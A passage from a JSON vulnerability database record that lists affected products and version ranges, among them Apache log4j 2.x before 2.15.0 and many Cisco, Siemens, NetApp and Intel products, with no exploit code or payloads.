"version": "1.12.1"
},
{
"model": "smart phy",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1.2"
},
{
"model": "network services orchestrator",
"scope": "gte",
"trust": 1.0,
"vendor": "cisco",
"version": "5.4"
},
{
"model": "firepower threat defense",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "6.7.0"
},
{
"model": "network services orchestrator",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "5.4.5.2"
},
{
"model": "ucs central software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "2.0\\(1l\\)"
},
{
"model": "cyber vision sensor management extension",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "4.0.3"
},
{
"model": "wan automation engine",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.3"
},
{
"model": "snapcenter",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "fxos",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "6.4.0"
},
{
"model": "unified communications manager im \\\u0026 presence service",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5\\(1\\)"
},
{
"model": "network dashboard fabric controller",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.0\\(1\\)"
},
{
"model": "e-car operation center",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "2021-12-13"
},
{
"model": "sd-wan vmanage",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "20.7"
},
{
"model": "desigo cc info center",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "5.1"
},
{
"model": "virtualized infrastructure manager",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "3.4.4"
},
{
"model": "intersight virtual appliance",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.9-361"
},
{
"model": "network insights for data center",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "6.0\\(2.1914\\)"
},
{
"model": "vm access proxy",
"scope": "lt",
"trust": 1.0,
"vendor": "snowsoftware",
"version": "3.6"
},
{
"model": "ucs central software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "2.0\\(1c\\)"
},
{
"model": "virtualized infrastructure manager",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2.0"
},
{
"model": "wan automation engine",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "7.3.0.2"
},
{
"model": "unified contact center enterprise",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "11.6\\(2\\)"
},
{
"model": "packaged contact center enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.6\\(1\\)"
},
{
"model": "connected analytics for network deployment",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "007.003.003"
},
{
"model": "crosswork platform infrastructure",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "4.0.1"
},
{
"model": "energyip",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "8.5"
},
{
"model": "cloudcenter cost optimizer",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "5.5.2"
},
{
"model": "virtualized infrastructure manager",
"scope": "gte",
"trust": 1.0,
"vendor": "cisco",
"version": "3.4.0"
},
{
"model": "network dashboard fabric controller",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5\\(2\\)"
},
{
"model": "captial",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "2019.1"
},
{
"model": "unity connection",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5"
},
{
"model": "firepower threat defense",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.1.0"
},
{
"model": "sipass integrated",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "2.85"
},
{
"model": "sd-wan vmanage",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "20.5.1.1"
},
{
"model": "identity services engine",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "003.001\\(000.518\\)"
},
{
"model": "oncommand insight",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "optical network controller",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.1"
},
{
"model": "unified contact center express",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "12.6\\(2\\)"
},
{
"model": "video surveillance manager",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.14\\(4.018\\)"
},
{
"model": "paging server",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "14.4.1"
},
{
"model": "integrated management controller supervisor",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "2.3.2.1"
},
{
"model": "paging server",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.3\\(1\\)"
},
{
"model": "nx",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "*"
},
{
"model": "network assurance engine",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "6.0\\(2.1912\\)"
},
{
"model": "unified customer voice portal",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "12.0\\(1\\)"
},
{
"model": "firepower threat defense",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "6.2.3"
},
{
"model": "log4j",
"scope": "lt",
"trust": 1.0,
"vendor": "apache",
"version": "2.15.0"
},
{
"model": "virtual topology system",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "2.6.6"
},
{
"model": "paging server",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "9.0\\(1\\)"
},
{
"model": "identity services engine",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "2.4.0"
},
{
"model": "unified sip proxy",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "010.002\\(000\\)"
},
{
"model": "wan automation engine",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.6"
},
{
"model": "unified communications manager",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5\\(1\\)"
},
{
"model": "navigator",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "2021-12-13"
},
{
"model": "sd-wan vmanage",
"scope": "gte",
"trust": 1.0,
"vendor": "cisco",
"version": "20.5"
},
{
"model": "mobility services engine",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "unified contact center enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "12.0\\(1\\)"
},
{
"model": "unified communications manager im and presence service",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5\\(1\\)"
},
{
"model": "network dashboard fabric controller",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.2\\(1\\)"
},
{
"model": "sd-wan vmanage",
"scope": "gte",
"trust": 1.0,
"vendor": "cisco",
"version": "20.4"
},
{
"model": "virtual topology system",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "2.6.7"
},
{
"model": "cyber vision sensor management extension",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.0.2"
},
{
"model": "sppa-t3000 ses3000",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "*"
},
{
"model": "connected analytics for network deployment",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "007.000.001"
},
{
"model": "energyip",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "9.0"
},
{
"model": "opcenter intelligence",
"scope": "lte",
"trust": 1.0,
"vendor": "siemens",
"version": "3.2"
},
{
"model": "business process automation",
"scope": "gte",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2.000.000"
},
{
"model": "broadworks",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "evolved programmable network manager",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "5.0"
},
{
"model": "wan automation engine",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.1.3"
},
{
"model": "cloud secure agent",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "siveillance identity",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "1.6"
},
{
"model": "connected analytics for network deployment",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "008.000.000"
},
{
"model": "wan automation engine",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2.1"
},
{
"model": "unified intelligence center",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "12.6\\(1\\)"
},
{
"model": "contact center domain manager",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "12.5\\(1\\)"
},
{
"model": "active iq unified manager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "common services platform collector",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "002.009\\(000.000\\)"
},
{
"model": "network dashboard fabric controller",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.1\\(1\\)"
},
{
"model": "energy engage",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "3.1"
},
{
"model": "enterprise chat and email",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "12.0\\(1\\)"
},
{
"model": "evolved programmable network manager",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1"
},
{
"model": "crosswork network automation",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "2.0.0"
},
{
"model": "dna center",
"scope": "gte",
"trust": 1.0,
"vendor": "cisco",
"version": "2.2.3.0"
},
{
"model": "rhythmyx",
"scope": "lte",
"trust": 1.0,
"vendor": "percussion",
"version": "7.3.2"
},
{
"model": "cx cloud agent",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "001.012"
},
{
"model": "identity services engine",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "002.007\\(000.356\\)"
},
{
"model": "common services platform collector",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "2.9.1.3"
},
{
"model": "firepower threat defense",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "6.3.0"
},
{
"model": "unified customer voice portal",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "12.6\\(1\\)"
},
{
"model": "smart phy",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1.4"
},
{
"model": "computer vision annotation tool",
"scope": "eq",
"trust": 1.0,
"vendor": "intel",
"version": null
},
{
"model": "unified customer voice portal",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "12.5"
},
{
"model": "energyip",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "8.6"
},
{
"model": "unified contact center express",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "12.6\\(1\\)"
},
{
"model": "crosswork zero touch provisioning",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "2.0.1"
},
{
"model": "cloudcenter suite admin",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "5.3.1"
},
{
"model": "connected analytics for network deployment",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "008.000.000.000.004"
},
{
"model": "unified contact center enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "12.6\\(1\\)"
},
{
"model": "unified customer voice portal",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "12.0"
},
{
"model": "nexus insights",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "6.0.2"
},
{
"model": "unified sip proxy",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "10.2.1v2"
},
{
"model": "desigo cc info center",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "5.0"
},
{
"model": "finesse",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "12.6\\(1\\)"
},
{
"model": "connected analytics for network deployment",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.3"
},
{
"model": "firepower threat defense",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "6.4.0"
},
{
"model": "connected analytics for network deployment",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "006.005.000."
},
{
"model": "unified customer voice portal",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.6"
},
{
"model": "sd-wan vmanage",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "20.6.2.1"
},
{
"model": "evolved programmable network manager",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "5.1"
},
{
"model": "unified workforce optimization",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5\\(1\\)"
},
{
"model": "smart phy",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2.1"
},
{
"model": "desigo cc advanced reports",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "4.0"
},
{
"model": "business process automation",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "3.2.000.009"
},
{
"model": "ucs central software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "2.0\\(1e\\)"
},
{
"model": "paging server",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "9.0\\(2\\)"
},
{
"model": "siguard dsa",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "4.2"
},
{
"model": "ucs central software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "2.0\\(1d\\)"
},
{
"model": "finesse",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "12.6\\(1\\)"
},
{
"model": "ucs central software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "2.0\\(1a\\)"
},
{
"model": "solid edge harness design",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "2020"
},
{
"model": "solid edge harness design",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "2020"
},
{
"model": "cloud insights",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "log4j",
"scope": "eq",
"trust": 1.0,
"vendor": "apache",
"version": "2.0"
},
{
"model": "sensor solution development kit",
"scope": "eq",
"trust": 1.0,
"vendor": "intel",
"version": null
},
{
"model": "crosswork network controller",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "2.0.1"
},
{
"model": "gma-manager",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "8.6.2j-398"
},
{
"model": "business process automation",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1.000.044"
},
{
"model": "identity services engine",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "003.000\\(000.458\\)"
},
{
"model": "prime service catalog",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "12.1"
},
{
"model": "crosswork optimization engine",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "2.0.1"
},
{
"model": "vesys",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "2019.1"
},
{
"model": "siveillance viewpoint",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "*"
},
{
"model": "sd-wan vmanage",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "20.5"
},
{
"model": "automated subsea tuning",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "2.1.0"
},
{
"model": "log4j",
"scope": "gte",
"trust": 1.0,
"vendor": "apache",
"version": "2.4.0"
},
{
"model": "crosswork data gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.0.0"
},
{
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "34"
},
{
"model": "paging server",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "14.0\\(1\\)"
},
{
"model": "dna center",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "2.2.3.4"
},
{
"model": "sd-wan vmanage",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "20.4"
},
{
"model": "ucs central",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "2.0\\(1p\\)"
},
{
"model": "email security",
"scope": "lt",
"trust": 1.0,
"vendor": "sonicwall",
"version": "10.0.12"
},
{
"model": "smart phy",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1.3"
},
{
"model": "synchro",
"scope": "gte",
"trust": 1.0,
"vendor": "bentley",
"version": "6.1"
},
{
"model": "sentron powermanager",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "4.1"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"model": "dna spaces",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "crosswork network automation",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.0.0"
},
{
"model": "wan automation engine",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.5"
},
{
"model": "spectrum power 4",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "4.70"
},
{
"model": "automated subsea tuning",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "02.01.00"
},
{
"model": "sd-wan vmanage",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "20.6.1"
},
{
"model": "unified sip proxy",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "010.000\\(001\\)"
},
{
"model": "comos",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "*"
},
{
"model": "ucs central software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "2.0\\(1b\\)"
},
{
"model": "fxos",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "6.6.0"
},
{
"model": "unity connection",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5\\(1\\)"
},
{
"model": "sentron powermanager",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "4.2"
},
{
"model": "ucs central software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "2.0"
},
{
"model": "evolved programmable network manager",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.1"
},
{
"model": "logo\\! soft comfort",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "*"
},
{
"model": "evolved programmable network manager",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.0"
},
{
"model": "unified communications manager",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5\\(1.18119.2\\)"
},
{
"model": "network assurance engine",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "6.0.2"
},
{
"model": "emergency responder",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5\\(4\\)"
},
{
"model": "log4j",
"scope": "gte",
"trust": 1.0,
"vendor": "apache",
"version": "2.13.0"
},
{
"model": "cloudcenter suite",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.10\\(0.15\\)"
},
{
"model": "wan automation engine",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.2.2"
},
{
"model": "dna center",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "2.2.2.8"
},
{
"model": "secure device onboard",
"scope": "eq",
"trust": 1.0,
"vendor": "intel",
"version": null
},
{
"model": "solid edge cam pro",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "*"
},
{
"model": "fxos",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.0.0"
},
{
"model": "unified sip proxy",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "010.002\\(001\\)"
},
{
"model": "unified contact center enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "12.6\\(2\\)"
},
{
"model": "sd-wan vmanage",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "20.3.4.1"
},
{
"model": "log4j",
"scope": "lt",
"trust": 1.0,
"vendor": "apache",
"version": "2.3.1"
},
{
"model": "energyip prepay",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "3.7"
},
{
"model": "audio development kit",
"scope": "eq",
"trust": 1.0,
"vendor": "intel",
"version": null
},
{
"model": "common services platform collector",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "002.009\\(001.001\\)"
},
{
"model": "video surveillance manager",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.14\\(1.26\\)"
},
{
"model": "xpedition package integrator",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": null
},
{
"model": "genomics kernel library",
"scope": "eq",
"trust": 1.0,
"vendor": "intel",
"version": null
},
{
"model": "connected analytics for network deployment",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "007.003.001.001"
},
{
"model": "ucs central software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "2.0\\(1g\\)"
},
{
"model": "identity services engine",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "003.002\\(000.116\\)"
},
{
"model": "ucs central software",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "2.0\\(1h\\)"
},
{
"model": "business process automation",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "3.0.000.115"
},
{
"model": "desigo cc advanced reports",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "4.2"
},
{
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "35"
},
{
"model": "connected mobile experiences",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "cloudcenter workload manager",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "5.5.2"
},
{
"model": "unity connection",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5\\(1.10000.6\\)"
},
{
"model": "spectrum power 7",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "2.30"
},
{
"model": "fog director",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "network services orchestrator",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "5.6.3.1"
},
{
"model": "common services platform collector",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "002.009\\(001.002\\)"
},
{
"model": "log4j",
"scope": "gte",
"trust": 1.0,
"vendor": "apache",
"version": "2.0.1"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"model": "webex meetings server",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "3.0"
},
{
"model": "connected analytics for network deployment",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "006.005.000.000"
},
{
"model": "enterprise chat and email",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "12.5\\(1\\)"
},
{
"model": "smart phy",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "21.3"
},
{
"model": "contact center management portal",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "12.5\\(1\\)"
},
{
"model": "crosswork network automation",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.1.0"
},
{
"model": "unified customer voice portal",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "12.5\\(1\\)"
},
{
"model": "data center manager",
"scope": "lt",
"trust": 1.0,
"vendor": "intel",
"version": "5.1"
},
{
"model": "crosswork platform infrastructure",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.1.0"
},
{
"model": "cloudcenter suite",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "5.5\\(0\\)"
},
{
"model": "connected analytics for network deployment",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "007.001.000"
},
{
"model": "unified communications manager",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5\\(1.22900.28\\)"
},
{
"model": "unified contact center express",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "12.5\\(1\\)"
},
{
"model": "dna spaces connector",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "desigo cc advanced reports",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "5.0"
},
{
"model": "synchro",
"scope": "lt",
"trust": 1.0,
"vendor": "bentley",
"version": "6.4.3.2"
},
{
"model": "energyip",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "8.7"
},
{
"model": "common services platform collector",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "002.009\\(000.002\\)"
},
{
"model": "siguard dsa",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "4.4"
},
{
"model": "business process automation",
"scope": "gte",
"trust": 1.0,
"vendor": "cisco",
"version": "3.1.000.000"
},
{
"model": "identity services engine",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "002.006\\(000.156\\)"
},
{
"model": "snow commander",
"scope": "lt",
"trust": 1.0,
"vendor": "snowsoftware",
"version": "8.10.0"
},
{
"model": "paging server",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "8.4\\(1\\)"
},
{
"model": "network services orchestrator",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "5.3.5.1"
},
{
"model": "fxos",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "6.5.0"
},
{
"model": "energyip prepay",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "3.8"
},
{
"model": "cloud manager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "unified communications manager im \\\u0026 presence service",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5\\(1.22900.6\\)"
},
{
"model": "head-end system universal device integration system",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "*"
},
{
"model": "unified communications manager",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5\\(1\\)su3"
},
{
"model": "unified sip proxy",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "010.000\\(000\\)"
},
{
"model": "industrial edge management",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "*"
},
{
"model": "webex meetings server",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "4.0"
},
{
"model": "cloudcenter suite",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "5.3\\(0\\)"
},
{
"model": "industrial edge management hub",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "2021-12-13"
},
{
"model": "oneapi sample browser",
"scope": "eq",
"trust": 1.0,
"vendor": "intel",
"version": null
},
{
"model": "virtualized voice browser",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "12.5\\(1\\)"
},
{
"model": "operation scheduler",
"scope": "lte",
"trust": 1.0,
"vendor": "siemens",
"version": "1.1.3"
},
{
"model": "sd-wan vmanage",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "20.4.2.1"
},
{
"model": "finesse",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "12.5\\(1\\)"
},
{
"model": "advanced malware protection virtual private cloud appliance",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "3.5.4"
},
{
"model": "integrated management controller supervisor",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "002.003\\(002.000\\)"
},
{
"model": "synchro 4d",
"scope": "lt",
"trust": 1.0,
"vendor": "bentley",
"version": "6.2.4.2"
},
{
"model": "unified intelligence center",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "12.6\\(1\\)"
},
{
"model": "mendix",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "*"
},
{
"model": "firepower threat defense",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "6.6.0"
},
{
"model": "siveillance identity",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "1.5"
},
{
"model": "unified customer voice portal",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "11.6"
},
{
"model": "network dashboard fabric controller",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.4\\(1\\)"
},
{
"model": "unified communications manager",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5\\(1.21900.40\\)"
},
{
"model": "common services platform collector",
"scope": "gte",
"trust": 1.0,
"vendor": "cisco",
"version": "2.10.0"
},
{
"model": "identity services engine",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "002.004\\(000.914\\)"
},
{
"model": "wan automation engine",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "7.4"
},
{
"model": "siveillance control pro",
"scope": "eq",
"trust": 1.0,
"vendor": "siemens",
"version": "*"
},
{
"model": "system studio",
"scope": "eq",
"trust": 1.0,
"vendor": "intel",
"version": null
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "11.0"
},
{
"model": "network dashboard fabric controller",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "11.5\\(1\\)"
},
{
"model": "integrated management controller supervisor",
"scope": "eq",
